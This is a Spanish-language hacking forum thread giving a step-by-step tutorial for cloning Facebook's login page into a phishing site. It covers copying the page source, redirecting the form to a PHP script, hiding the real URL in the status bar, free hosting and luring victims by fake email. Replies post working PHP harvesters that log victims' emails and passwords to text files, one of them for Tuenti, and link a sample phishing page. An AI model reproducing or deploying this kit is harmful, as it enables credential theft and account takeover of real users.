phishing fakebuuk

Iniciado por p1r4t0s, 8 Febrero 2011, 04:42 AM

0 Miembros y 2 Visitantes están viendo este tema.

p1r4t0s

Bueno este es un ejemplo de phishing
.
.
.
Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material... :xD

Cosas que vamos a necesitar:  :P

    +Conocimietos basicos de html y php 
    +Archivo index.htm con la fake page
    +Archivo write.php con el script capture pass
    +Archivo pass.txt donde se guardaran las pass
   
Paso1.-
Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com

Paso2.-
Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm

3.-Buscamos los campos el formulario donde se pone el user y pass.

<form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form>



4.- Editamos donde empieza el form y cambiamos: <form method=GET action=write.php ...esto hace que el form ejecute a write.php con la función GET

5.- Editamos en el boton imput entrar: <input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" />... para que no se vea la url en la barra de estado...

no pongo todo el code pq es muuuy largo :xD


6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a)

7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas)

8.-Ahora tenemos hecho el 50% del trabajo,  toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona.
 
Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos.  Como ven no tiene mucha ciencia los cripts en si.

Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD


Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español :D
y solo quería comprobar lo que se puede hacer :)






taskkill religion.exe, politica.exe, dinero.exe  = no more wars  ;D  the way it's  meant to be played...

JuszR

Una especia de xploit, o me equivoco ?
- No programming language is perfect. There is not even a single best language; there are only languages well suited or perhaps poorly suited for particular purposes. [Herbert Mayer]

p1r4t0s

Hola JuszR,  un xploit seria el mail seria el fake mail y este es una fake page.

Citar
XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.

Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

PHISHING
Ver en wiki

Espero que la explicación resuelva tus dudas  :D


taskkill religion.exe, politica.exe, dinero.exe  = no more wars  ;D  the way it's  meant to be played...

johndogget

hola soy nuevo y con poca experiencia y sobre todo conocimientos. como armas el fake mail para que sea igual a los que manda fezebuuk? gracias

Bl1ttCeR

#4
y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)
QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB

Runex

p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :).

Un saludo
"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".

Runex

Cita de: Runex en 12 Mayo 2012, 17:46 PM
p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :).

Aviso, no pongáis ningún dato en el formulario que se copian en un txt y solo lo hice como prueba, no quiero lios con compañeros :)

Un saludo :)
"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".

Bl1ttCeR

#7
Aquí os dejo una idea de write.php  ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.

Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da...


<?php
$email
="";
if (!empty(
$_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty(
$_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a"); 
fwrite($file,$email.$pass);  

header('Location: http://www.facebook.com');

?>
QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB

Runex

#8
Cita de: Bl1ttCeR en 12 Mayo 2012, 18:14 PM
Aquí os dejo una idea de write.php  ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime


<?php
$email
="";
if (!empty(
$_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty(
$_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a"); 
fwrite($file,$email.$pass);  

?>


Yo he usado éste para tuenti:

Código (php) [Seleccionar]
<?php
$email 
$_POST["email"];
$password $_POST["input_password"];
$archivo fopen("cuentas.txt","a");
fwrite($archivo,"Email: ".$email."   Password: ".$password);
fclose($archivo);
?>


Tampoco hay que calentarse mucho la cabeza xD. Eso que dices para loguearse, voy a ponerme ahora con ello pero simplemente hay que añadir un header como has hecho tú :)

Un saludo :)
"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".

Bl1ttCeR

#9
Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.


PD: este post tiene casi 2700visitas y nadie ha dicho nada...
QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB